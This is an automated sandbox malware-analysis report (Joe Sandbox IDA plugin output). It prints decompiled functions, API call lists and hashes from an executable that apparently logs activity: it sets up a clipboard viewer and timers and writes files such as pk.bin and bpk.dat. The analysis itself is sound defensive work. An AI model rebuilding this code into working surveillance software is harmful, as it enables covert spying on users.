    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$File$Delete$#5683$#4129$#537#858$#2818#3790#4277#540#924#939#941Move
    • String ID: !$pk.bin$th_
    • API String ID: 882306589-890230901
    • Opcode ID: 6782d8b2abdae28853ce5e7ff0a4a3a8019d2610ba2753e283fbf466a4933a91
    • Instruction ID: 8259b65b6b2bcebda76eddce74b94cf01f81ea2d90028f77b2b8d49171ab9716
    • Opcode Fuzzy Hash: 6782d8b2abdae28853ce5e7ff0a4a3a8019d2610ba2753e283fbf466a4933a91
    • Instruction Fuzzy Hash: D8C1D431D0128DEECF15EFE1D895AEDBBB4AF19304F00449EE40667282DB786B48CB65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E004223D1(void* __ecx, void* __edx, void* __eflags) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t196;
    				intOrPtr* _t213;
    				intOrPtr* _t218;
    				intOrPtr* _t223;
    				intOrPtr* _t228;
    				intOrPtr* _t233;
    				intOrPtr* _t238;
    				intOrPtr* _t243;
    				intOrPtr* _t248;
    				void* _t251;
    				void* _t252;
    				void* _t256;
    				void* _t257;
    				void* _t258;
    				void* _t259;
    				intOrPtr* _t277;
    				intOrPtr* _t278;
    				intOrPtr* _t279;
    				char _t303;
    				intOrPtr _t313;
    				void* _t314;
    				CHAR** _t379;
    				void* _t380;
    				intOrPtr _t382;
    				signed int _t392;
    				void* _t393;
    				_Unknown_base(*)()* _t396;
    				void* _t400;
    				void* _t402;
    				void* _t404;
    				intOrPtr _t406;
    				void* _t415;
    
    				_t393 = __edx;
    				_t314 = __ecx;
    				E0043E4E0(0x442476, _t402);
    				_t196 = E0043E690(0x1978, __ecx);
    				_t400 = _t314;
    				_t409 =  *(_t400 + 0x2744);
    				if( *(_t400 + 0x2744) != 0) {
    					L48:
    					 *[fs:0x0] =  *((intOrPtr*)(_t402 - 0xc));
    					return _t196;
    				}
    				_t396 = 0;
    				_push(0);
    				E0040D26E(_t402 - 0x890, _t409);
    				_push(0);
    				 *(_t402 - 4) = 0;
    				E00418E5D(_t402 - 0x3c4);
    				_push(0);
    				 *(_t402 - 4) = 1;
    				E0042AF2E(_t402 - 0xac4);
    				_push(0);
    				 *(_t402 - 4) = 2;
    				E00419770(_t402 - 0xe18);
    				_push(0);
    				 *(_t402 - 4) = 3;
    				E0041AA04(_t402 - 0x1984);
    				_push(0);
    				 *(_t402 - 4) = 4;
    				L0042C4A8(_t402 - 0xc60);
    				_push(0);
    				 *(_t402 - 4) = 5;
    				L0040676C(_t402 - 0x1478);
    				_push(0);
    				 *(_t402 - 4) = 6;
    				E00403ED5(_t402 - 0x1080);
    				 *(_t402 - 4) = 7;
    				E0040B74B(_t402 - 0x84, 0);
    				_t313 = _t400 + 0x16b8;
    				 *(_t402 - 4) = 8;
    				 *((intOrPtr*)(_t402 - 0x360)) = _t313;
    				memcpy(_t402 - 0x35c, _t400 + 0x17cc, 4);
    				 *((intOrPtr*)(_t402 - 0xa5c)) = _t400 + 0x3e8;
    				 *((intOrPtr*)(_t402 - 0xa58)) = _t400 + 0x89c;
    				 *((intOrPtr*)(_t402 - 0xe5c)) = _t400 + 0x1204;
    				 *((intOrPtr*)(_t402 - 0xdb4)) = _t313;
    				 *((intOrPtr*)(_t402 - 0x1920)) = _t313;
    				 *((intOrPtr*)(_t402 - 0x1084)) = _t313;
    				 *((intOrPtr*)(_t402 - 0xbfc)) = _t313;
    				 *((intOrPtr*)(_t402 - 0x101c)) = _t313;
    				 *((intOrPtr*)(_t402 - 0xa60)) = _t313;
    				 *((intOrPtr*)(_t402 - 0x20)) = _t313;
    				_t213 = E00429029(_t402 - 0x10, 0xe001);
    				_t406 = _t404 + 0x14;
    				_push(0);
    				_push( *_t213);
    				_push(_t402 - 0x3c4);
    				 *(_t402 - 4) = 9;
    				E0040D958(_t402 - 0x890);
    				 *(_t402 - 4) = 8;
    				L0043DD36();
    				_t218 = E00429029(_t402 - 0x10, 0xe05b);
    				_push(0);
    				_push( *_t218);
    				_push(_t402 - 0xe18);
    				 *(_t402 - 4) = 0xa;
    				E0040D958(_t402 - 0x890);
    				 *(_t402 - 4) = 8;
    				L0043DD36();
    				_t223 = E00429029(_t402 - 0x10, 0xe02a);
    				_push(0);
    				_push( *_t223);
    				_push(_t402 - 0xc60);
    				 *(_t402 - 4) = 0xb;
    				E0040D958(_t402 - 0x890);
    				 *(_t402 - 4) = 8;
    				L0043DD36();
    				_t228 = E00429029(_t402 - 0x10, 0xe021);
    				_push(0);
    				_push( *_t228);
    				_push(_t402 - 0x1984);
    				 *(_t402 - 4) = 0xc;
    				E0040D958(_t402 - 0x890);
    				 *(_t402 - 4) = 8;
    				L0043DD36();
    				_t233 = E00429029(_t402 - 0x10, 0xe039);
    				_push(0);
    				_push( *_t233);
    				_push(_t402 - 0x1478);
    				 *(_t402 - 4) = 0xd;
    				E0040D958(_t402 - 0x890);
    				 *(_t402 - 4) = 8;
    				L0043DD36();
    				_t238 = E00429029(_t402 - 0x10, 0xe057);
    				_push(0);
    				_push( *_t238);
    				_push(_t402 - 0x1080);
    				 *(_t402 - 4) = 0xe;
    				E0040D958(_t402 - 0x890);
    				 *(_t402 - 4) = 8;
    				L0043DD36();
    				_t243 = E00429029(_t402 - 0x10, 0xe00c);
    				_push(0);
    				_push( *_t243);
    				_push(_t402 - 0xac4);
    				 *(_t402 - 4) = 0xf;
    				E0040D958(_t402 - 0x890);
    				 *(_t402 - 4) = 8;
    				L0043DD36();
    				_t248 = E00429029(_t402 - 0x10, 0xe03c);
    				_push(0);
    				_push( *_t248);
    				_push(_t402 - 0x84);
    				 *(_t402 - 4) = 0x10;
    				_t251 = E0040D958(_t402 - 0x890);
    				 *(_t402 - 4) = 8;
    				L0043DD36();
    				_t252 = E00422AF4(_t251);
    				_push(_t402 - 0x10);
    				 *((intOrPtr*)(_t402 - 0x14)) = _t406;
    				_push( *((intOrPtr*)(_t252 + 0x7c)));
    				L0043DE26();
    				E00422B68(_t402 - 0x890);
    				 *((intOrPtr*)(_t402 - 0x10)) = E00429029(_t402 - 0x14, 0xe01c);
    				 *(_t402 - 4) = 0x11;
    				_t256 = E00422AF4(_t255);
    				_push( *((intOrPtr*)(_t256 + 0x7c)));
    				L0043DE26();
    				_push(_t402 - 0x1c);
    				 *(_t402 - 4) = 0x12;
    				 *((intOrPtr*)(_t402 - 0x18)) = _t406;
    				_push( *((intOrPtr*)(_t402 - 0x10)));
    				_push(_t256);
    				_push(_t406);
    				L0043E282();
    				_t257 = E00422B31(_t402 - 0x890);
    				 *(_t402 - 4) = 0x11;
    				L0043DD36();
    				 *(_t402 - 4) = 8;
    				L0043DD36();
    				 *(_t400 + 0x2744) = 1;
    				_t258 = E004221C8(_t257, _t400, 1);
    				L0043DE7A();
    				 *(_t400 + 0x2744) =  *(_t400 + 0x2744) & 0x00000000;
    				if(_t258 != 1) {
    					L44:
    					_push(1);
    					_t259 = E00422006(_t400);
    					if( *((intOrPtr*)(_t400 + 0x2728)) == _t396) {
    						_t436 =  *((char*)(_t400 + 0x17dc));
    						if( *((char*)(_t400 + 0x17dc)) != 0) {
    							_push(_t396);
    							L00414067(_t402 - 0x200, _t436);
    							 *(_t402 - 4) = 0x15;
    							L0043DE7A();
    							 *(_t402 - 4) = 8;
    							_t259 = L004140E9(_t402 - 0x200, _t436);
    						}
    					}
    					 *(_t402 - 4) = 7;
    					E0040E7E0();
    					 *(_t402 - 4) = 6;
    					L00404007(_t259, _t402 - 0x1080, _t400);
    					 *(_t402 - 4) = 5;
    					L00406845(_t402 - 0x1478, _t436);
    					 *(_t402 - 4) = 4;
    					E00422C65(_t402 - 0xc60);
    					 *(_t402 - 4) = 3;
    					E0041AA8D(_t402 - 0x1984, _t436);
    					 *(_t402 - 4) = 2;
    					E004197FA(_t402 - 0xe18);
    					 *(_t402 - 4) = 1;
    					E00422BD3(_t402 - 0xac4);
    					 *(_t402 - 4) =  *(_t402 - 4) & 0x00000000;
    					E00418ED0(_t402 - 0x3c4);
    					 *(_t402 - 4) =  *(_t402 - 4) | 0xffffffff;
    					_t196 = E0040D3F6(_t402 - 0x890);
    					goto L48;
    				}
    				if( *((char*)(_t400 + 0x1805)) == 0) {
    					_push(0x4558c8);
    					_t379 = 0x4558c4;
    					L0043DFCA();
    				} else {
    					_t303 =  *0x4550cc; // 0x0
    					 *(_t402 - 0x188) = _t303;
    					_t392 = 0x40;
    					memset(_t402 - 0x187, 0, _t392 << 2);
    					_t406 = _t406 + 0xc;
    					_t379 = 0;
    					asm("stosw");
    					asm("stosb");
    					if(ExpandEnvironmentStringsA(_t400 + 0x1808, _t402 - 0x188, 0x102) != 0) {
    						_t379 = 0x4558c4;
    						_push(_t402 - 0x188);
    						L0043DDD2();
    					}
    					CreateDirectoryA( *0x4558c4, 0);
    					_t396 = 0;
    				}
    				_push(_t379);
    				 *((intOrPtr*)(_t402 - 0x18)) = _t406;
    				_push("web.dat");
    				_push(0x4558c4);
    				_push(_t406);
    				L0043DE20();
    				 *(_t402 - 4) = 8;
    				_t380 = L00414496(_t379);
    				E00422B9F(_t380);
    				_push(_t380);
    				 *((intOrPtr*)(_t402 - 0x18)) = _t406;
    				_push("bpkch.dat");
    				_push(0x4558c4);
    				_push(_t406);
    				L0043DE20();
    				E00422AFD( *((intOrPtr*)(_t400 + 0x60)));
    				memcpy(_t400 + 0x17cc, _t402 - 0x35c, 4);
    				if( *((char*)(_t400 + 0x17dc)) == 0) {
    					L10:
    					E00428249();
    					goto L11;
    				} else {
    					_t414 =  *((char*)(_t400 + 0x17e8));
    					if( *((char*)(_t400 + 0x17e8)) != 0) {
    						goto L10;
    					}
    					E0042817C(_t400, _t414, 0x4550cc,  *((intOrPtr*)(_t400 + 0x1a14)));
    					L11:
    					_t415 =  *0x455aa4 - _t396; // 0x0
    					if(_t415 != 0) {
    						 *0x455aa4(GetCurrentProcessId(),  *(_t400 + 0x17e1) & 0x000000ff);
    					}
    					_t277 =  *((intOrPtr*)(_t400 + 0x2768));
    					if(_t277 != _t396) {
    						 *_t277( *(_t400 + 0x17e1) & 0x000000ff);
    					}
    					_t278 =  *((intOrPtr*)(_t400 + 0x275c));
    					if(_t278 != _t396) {
    						 *_t278( *(_t400 + 0x17de) & 0x000000ff);
    					}
    					_t279 =  *((intOrPtr*)(_t400 + 0x2760));
    					if(_t279 != _t396) {
    						_t279 =  *_t279( *(_t400 + 0x17ef) & 0x000000ff);
    					}
    					if( *(_t400 + 0x17e4) != 0 && ( *(_t400 + 0x17cc) & 0xffff7fff) == 0) {
    						_push(0xffffffff);
    						_push(0x40);
    						_push(0xe027);
    						L0043E2CA();
    						 *(_t400 + 0x17e4) =  *(_t400 + 0x17e4) & 0x00000000;
    					}
    					if( *(_t400 + 0x17e2) != 0) {
    						if(_t279 == 0) {
    							_push(0xffffffff);
    							_push(0x10);
    							_push(0xe020);
    							L0043E2CA();
    						}
    						 *(_t400 + 0x17e2) =  *(_t400 + 0x17e2) & 0x00000000;
    					}
    					if( *(_t400 + 0x17e3) != 0) {
    						if(L004233EA(_t279, _t313, _t393, _t396, _t400) == 0) {
    							_push(0xffffffff);
    							_push(0x10);
    							_push(0xe01f);
    							L0043E2CA();
    						}
    						 *(_t400 + 0x17e3) =  *(_t400 + 0x17e3) & 0x00000000;
    					}
    					KillTimer( *(_t400 + 0x20), 0xe);
    					if( *((char*)(_t400 + 0x17c9)) != 0) {
    						SetTimer( *(_t400 + 0x20), 0xe, 0xea60, _t396);
    					}
    					KillTimer( *(_t400 + 0x20), 0x11);
    					if( *((char*)(_t400 + 0x1a18)) != 0) {
    						SetTimer( *(_t400 + 0x20), 0x11, 0xea60, _t396);
    					}
    					KillTimer( *(_t400 + 0x20), 0xf);
    					if( *((char*)(_t400 + 0x17e5)) != 0) {
    						SetTimer( *(_t400 + 0x20), 0xf, ( *(_t400 + 0x1d3c) * 0x3c +  *((intOrPtr*)(_t400 + 0x1d40))) * 0x3e8, _t396);
    					}
    					ChangeClipboardChain( *(_t400 + 0x20),  *(_t400 + 0x2738));
    					 *(_t400 + 0x2738) = _t396;
    					if( *((char*)(_t400 + 0x1d38)) != 0) {
    						 *(_t400 + 0x2738) = SetClipboardViewer( *(_t400 + 0x20));
    					}
    					_t382 =  *((intOrPtr*)(_t400 + 0x60));
    					if( *((char*)(_t400 + 0x17f9)) == 0) {
    						__eflags =  *((char*)(_t382 + 0x44));
    						if(__eflags != 0) {
    							E0040F11F(_t382);
    						}
    					} else {
    						_t434 =  *((char*)(_t382 + 0x44));
    						if( *((char*)(_t382 + 0x44)) == 0) {
    							E0040F0EB(_t382);
    						}
    					}
    					_push("pk.bin");
    					_push(0x4558c8);
    					_push(_t402 - 0x14);
    					L0043DE20();
    					 *(_t402 - 4) = 0x14;
    					E0040BC5C(_t313, _t434,  *((intOrPtr*)(_t402 - 0x14)));
    					 *(_t402 - 4) = 8;
    					L0043DD36();
    					goto L44;
    				}
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 004223D6
      • Part of subcall function 0040D26E: __EH_prolog.LIBCMT ref: 0040D273
      • Part of subcall function 0040D26E: #324.MFC42(00000075,?), ref: 0040D286
      • Part of subcall function 0040D26E: #567.MFC42(00000075,?), ref: 0040D2B3
      • Part of subcall function 0040D26E: #567.MFC42 ref: 0040D306
      • Part of subcall function 0040D26E: #500.MFC42 ref: 0040D31B
      • Part of subcall function 0040D26E: #540.MFC42 ref: 0040D32A
      • Part of subcall function 0040D26E: #540.MFC42 ref: 0040D339
      • Part of subcall function 0040D26E: #6142.MFC42(00000000,000000FF), ref: 0040D38D
      • Part of subcall function 0040D26E: CreateSolidBrush.GDI32(00EFEFEF), ref: 0040D39D
      • Part of subcall function 0040D26E: #1641.MFC42(00000000), ref: 0040D3A6
      • Part of subcall function 00418E5D: __EH_prolog.LIBCMT ref: 00418E62
      • Part of subcall function 00418E5D: #567.MFC42(00000078,?), ref: 00418E82
      • Part of subcall function 0042AF2E: __EH_prolog.LIBCMT ref: 0042AF33
      • Part of subcall function 0042AF2E: #567.MFC42(?,00000000,?,00422424,00000000), ref: 0042AF81
      • Part of subcall function 0042AF2E: #567.MFC42(?,00000000,?,00422424,00000000), ref: 0042AF99
      • Part of subcall function 0042AF2E: #567.MFC42(?,00000000,?,00422424,00000000), ref: 0042AFB0
      • Part of subcall function 0042AF2E: #384.MFC42(?,00000000,?,00422424,00000000), ref: 0042AFC1
      • Part of subcall function 00419770: __EH_prolog.LIBCMT ref: 00419775
      • Part of subcall function 0041AA04: __EH_prolog.LIBCMT ref: 0041AA09
      • Part of subcall function 0041AA04: #567.MFC42(000000AF,?), ref: 0041AA2C
      • Part of subcall function 00403ED5: __EH_prolog.LIBCMT ref: 00403EDA
      • Part of subcall function 00403ED5: #567.MFC42 ref: 00403F2A
    • memcpy.MSVCRT ref: 004224A4
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
      • Part of subcall function 0040D958: __EH_prolog.LIBCMT ref: 0040D95D
    • #800.MFC42 ref: 00422526
      • Part of subcall function 0040D958: #823.MFC42(00000010), ref: 0040D973
      • Part of subcall function 0040D958: #540.MFC42 ref: 0040D989
      • Part of subcall function 0040D958: #860.MFC42(?), ref: 0040D9A7
      • Part of subcall function 0040D958: #5860.MFC42(?,00000000,?), ref: 0040D9BC
    • #800.MFC42 ref: 0042255C
    • #800.MFC42 ref: 00422592
    • #800.MFC42 ref: 004225C8
    • #800.MFC42 ref: 004225FE
    • #800.MFC42 ref: 00422634
    • #800.MFC42 ref: 0042266A
    • #800.MFC42 ref: 004226A0
      • Part of subcall function 00422AF4: #1168.MFC42(004226AA), ref: 00422AF4
    • #537.MFC42(?), ref: 004226B3
      • Part of subcall function 00422B68: __EH_prolog.LIBCMT ref: 00422B6D
      • Part of subcall function 00422B68: #858.MFC42(?,004226C3,?), ref: 00422B80
      • Part of subcall function 00422B68: #800.MFC42(?,004226C3,?), ref: 00422B8C
    • #537.MFC42(?,?), ref: 004226E5
    • #922.MFC42(?,00000000,?,?,?,?), ref: 004226F9
      • Part of subcall function 00422B31: __EH_prolog.LIBCMT ref: 00422B36
      • Part of subcall function 00422B31: #858.MFC42(?,00422709,?,00000000,?,?,?,?), ref: 00422B49
      • Part of subcall function 00422B31: #800.MFC42(?,00422709,?,00000000,?,?,?,?), ref: 00422B55
    • #800.MFC42(?,00000000,?,?,?,?), ref: 00422710
    • #800.MFC42(?,00000000,?,?,?,?), ref: 0042271C
      • Part of subcall function 004221C8: #1168.MFC42(00000002,?,00420F0E,00000000,00000000,PKL Window), ref: 004221CC
      • Part of subcall function 004221C8: LoadImageA.USER32 ref: 004221F6
      • Part of subcall function 004221C8: DestroyIcon.USER32(00000000), ref: 00422214
    • #2514.MFC42 ref: 00422737
    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000102), ref: 00422783
    • #860.MFC42(?), ref: 00422799
      • Part of subcall function 0040F11F: __EH_prolog.LIBCMT ref: 0040F124
      • Part of subcall function 0040F11F: KillTimer.USER32(?,?,?,?,?,?,?,0040F0B0), ref: 0040F144
      • Part of subcall function 0040F11F: #535.MFC42(?,?,?,?,?,?,?,0040F0B0), ref: 0040F162
    • CreateDirectoryA.KERNEL32(00000000), ref: 004227A6
    • #858.MFC42(004558C8), ref: 004227BA
    • #924.MFC42(?,004558C4,web.dat,?,004558C8), ref: 004227D0
    • #924.MFC42(?,004558C4,bpkch.dat,?,?,004558C4,web.dat,?,004558C8), ref: 004227F6
    • memcpy.MSVCRT ref: 00422813
    • GetCurrentProcessId.KERNEL32(?), ref: 00422856
    • #1199.MFC42(0000E027,00000040,000000FF), ref: 004228BD
    • #1199.MFC42(0000E020,00000010,000000FF), ref: 004228E6
    • #1199.MFC42(0000E01F,00000010,000000FF), ref: 0042290F
    • KillTimer.USER32(?,0000000E), ref: 00422920
    • SetTimer.USER32(?,0000000E,0000EA60,00000000), ref: 0042293A
    • KillTimer.USER32(?,00000011), ref: 00422945
    • SetTimer.USER32(?,00000011,0000EA60,00000000), ref: 0042295F
    • KillTimer.USER32(?,0000000F), ref: 0042296A
    • SetTimer.USER32(?,0000000F,?,00000000), ref: 00422995
    • ChangeClipboardChain.USER32(?,?), ref: 004229A4
    • SetClipboardViewer.USER32(?), ref: 004229BC
    • #924.MFC42(?,004558C8,pk.bin), ref: 004229FA
    • #800.MFC42(?,004558C8,pk.bin), ref: 00422A13
    • #2514.MFC42 ref: 00422A48
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$H_prolog$#567$Timer$Kill$#1168#1199#537#540#858#924$#2514#860ClipboardCreateLoadmemcpy$#1641#324#384#500#535#5860#6142#823#922BrushChainChangeCurrentDestroyDirectoryEnvironmentExpandIconImageProcessSolidStringStringsViewer
    • String ID: bpkch.dat$pk.bin$v$D$web.dat
    • API String ID: 2857256436-81437182
    • Opcode ID: eadc3b15a2e80ed29484d289274490a3eed6a68b58234588f37229c3a068a9c0
    • Instruction ID: f2f248a0b11996a4997a722b9cb764c1f2a9b8a45637f394192b8b9a2d285391
    • Opcode Fuzzy Hash: eadc3b15a2e80ed29484d289274490a3eed6a68b58234588f37229c3a068a9c0
    • Instruction Fuzzy Hash: 90120770904398AADB25EBA5DD45BEEBBF4AF19304F04049EF149631C2DFB85B44CB25
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E004201B7(void* __ecx) {
    				int _t92;
    				signed int* _t97;
    				signed int _t98;
    				int _t140;
    				intOrPtr _t142;
    				intOrPtr _t145;
    				void* _t147;
    				char* _t149;
    				void* _t188;
    				void* _t191;
    				void* _t193;
    				void* _t199;
    				void* _t201;
    				intOrPtr* _t202;
    
    				E0043E4E0(0x441ec0, _t199);
    				_t202 = _t201 - 0x378;
    				_t147 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x360)) - 1 == 0xffffffff) {
    					L2:
    					_t92 = 0;
    				} else {
    					E004206E8(__ecx);
    					if( *((intOrPtr*)(_t147 + 0x360)) - 1 != 0xffffffff) {
    						__imp__time(_t147 + 0x10, _t188, _t193);
    						L0043E486();
    						 *(_t199 - 4) = 0;
    						L0043DDDE();
    						 *(_t199 - 4) = 1;
    						L0043DDD8();
    						 *(_t199 - 0x38) =  *(_t199 - 0x38) | 0xffffffff;
    						_push(0);
    						 *(_t199 - 4) = 2;
    						 *((intOrPtr*)(_t199 - 0x44)) = 0x445490;
    						 *((intOrPtr*)(_t199 - 0x3c)) = 0;
    						L0043DDD2();
    						_push("bpk.dat");
    						_t97 = _t199 - 0x1c;
    						_push(0x4558c4);
    						_push(_t97);
    						 *(_t199 - 4) = 3;
    						L0043DE20();
    						_t98 =  *_t97;
    						_push(_t199 - 0x44);
    						_push(0x3001);
    						_push(_t98);
    						 *(_t199 - 4) = 4;
    						L0043E480();
    						asm("sbb al, al");
    						 *(_t199 - 4) = 3;
    						 *((char*)(_t199 - 0x11)) =  ~_t98 + 1;
    						L0043DD36();
    						if( *((char*)(_t199 - 0x11)) == 0) {
    							E004205BC(_t147);
    							 *((intOrPtr*)( *((intOrPtr*)(_t199 - 0x30)) + 0x30))(2);
    							lstrcpynA(_t199 - 0x78, _t147 + 0x1c, 0x31);
    							E00429085(_t199 - 0x78);
    							 *_t202 = 0x105;
    							lstrcpynA(_t199 - 0x180, _t147 + 0x4e, 0);
    							lstrcpynA(_t199 - 0x384, _t147 + 0x152, 0x200);
    							E00429085(_t199 - 0x180);
    							E00429085(_t199 - 0x384);
    							asm("movsw");
    							asm("movsb");
    							E00429085(_t199 - 0x10);
    							_push(strlen(_t199 - 0x78));
    							_push(_t199 - 0x78);
    							L0043E47A();
    							_push(strlen(_t199 - 0x10));
    							_push(_t199 - 0x10);
    							L0043E47A();
    							_push(strlen(_t199 - 0x180));
    							_push(_t199 - 0x180);
    							L0043E47A();
    							_push(strlen(_t199 - 0x10));
    							_push(_t199 - 0x10);
    							L0043E47A();
    							_push(strlen(_t199 - 0x384));
    							_push(_t199 - 0x384);
    							L0043E47A();
    							_push(strlen(_t199 - 0x10));
    							_push(_t199 - 0x10);
    							L0043E47A();
    							_t191 = 0;
    							_push(0);
    							_push( *((intOrPtr*)(_t147 + 0x360)));
    							L0043E462();
    							_t149 =  *(_t147 + 0x35c);
    							L0043DDD8();
    							 *(_t199 - 4) = 6;
    							_t140 = strlen(_t149);
    							 *(_t199 - 0x1c) = _t140;
    							if(_t140 > 0) {
    								do {
    									_t145 =  *((intOrPtr*)(_t191 + _t149));
    									if(_t145 != 0xa) {
    										_push(_t145);
    										L0043E0C6();
    									} else {
    										_push("\r\n");
    										L0043E0CC();
    									}
    									_t191 = _t191 + 1;
    								} while (_t191 <  *(_t199 - 0x1c));
    							}
    							E00429085( *((intOrPtr*)(_t199 - 0x18)));
    							_t142 =  *((intOrPtr*)(_t199 - 0x18));
    							_push( *((intOrPtr*)(_t142 - 8)));
    							_push(_t142);
    							L0043E47A();
    							L0043E474();
    							_push(_t199 - 0x1c);
    							L0043E276();
    							 *(_t199 - 4) = 7;
    							E0042AAFA( *(_t199 - 0x1c));
    							 *(_t199 - 4) = 6;
    							L0043DD36();
    							_push(0xffffffff);
    							_push(0);
    							L0043E456();
    							 *(_t199 - 4) = 3;
    							L0043DD36();
    							 *((intOrPtr*)(_t199 - 0x44)) = 0x445490;
    							_push(1);
    							 *(_t199 - 4) = 8;
    							_pop(0);
    						} else {
    							 *((intOrPtr*)(_t199 - 0x44)) = 0x445490;
    							 *(_t199 - 4) = 5;
    						}
    						L0043DD36();
    						 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
    						 *((intOrPtr*)(_t199 - 0x44)) = 0x44547c;
    						L0043E46E();
    						_t92 = 0;
    					} else {
    						goto L2;
    					}
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t199 - 0xc));
    				return _t92;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 004201BC
      • Part of subcall function 004206E8: #5857.MFC42(?,00000000,?,?,?,?,004201DB,?), ref: 004206FE
      • Part of subcall function 004206E8: strstr.MSVCRT ref: 00420715
      • Part of subcall function 004206E8: #5602.MFC42(00000000,00000001,?,?,004201DB,?), ref: 00420724
      • Part of subcall function 004206E8: strstr.MSVCRT ref: 00420737
      • Part of subcall function 004206E8: #5602.MFC42(00000000,00000001,004201DB,?), ref: 00420746
      • Part of subcall function 004206E8: #5602.MFC42(?,00000001,004201DB,?), ref: 0042075F
      • Part of subcall function 004206E8: #5602.MFC42(00000000,00000001,?,00000001,004201DB,?), ref: 0042077A
    • time.MSVCRT ref: 004201F4
    • #533.MFC42(?,?), ref: 004201FE
    • #350.MFC42(?,?), ref: 0042020B
    • #540.MFC42(?,?), ref: 00420217
    • #860.MFC42(00000000,?,?), ref: 00420233
    • #924.MFC42(?,004558C4,bpk.dat,00000000,?,?), ref: 0042024A
    • #5194.MFC42(?,00003001,?,?,004558C4,bpk.dat,00000000,?,?), ref: 00420262
    • #800.MFC42(?,00003001,?,?,004558C4,bpk.dat,00000000,?,?), ref: 00420277
    • lstrcpynA.KERNEL32(?,?,00000031,?,?), ref: 004202B1
    • lstrcpynA.KERNEL32(?,?,?,?,?), ref: 004202CE
    • lstrcpynA.KERNEL32(?,?,00000200,?,?), ref: 004202E3
    • strlen.MSVCRT ref: 00420315
    • #6392.MFC42(?,00000000,?,?,?,?), ref: 00420325
    • strlen.MSVCRT ref: 0042032E
    • #6392.MFC42(?,00000000,?,00000000,?,?,?,?), ref: 0042033C
    • strlen.MSVCRT ref: 00420348
    • #6392.MFC42(?,00000000,?,00000000,?,00000000,?,?,?,?), ref: 00420359
    • strlen.MSVCRT ref: 00420362
    • #6392.MFC42(?,00000000,?,00000000,?,00000000,?,00000000,?,?,?,?), ref: 00420370
    • strlen.MSVCRT ref: 0042037C
    • #6392.MFC42(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,?,?,?), ref: 0042038D
    • strlen.MSVCRT ref: 00420396
    • #6392.MFC42(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,?,?,?), ref: 004203A4
    • #5857.MFC42(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 004203BB
    • #540.MFC42(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 004203C9
    • strlen.MSVCRT ref: 004203D3
    • #941.MFC42(00453C48,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 004203EF
    • #940.MFC42(00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 004203FA
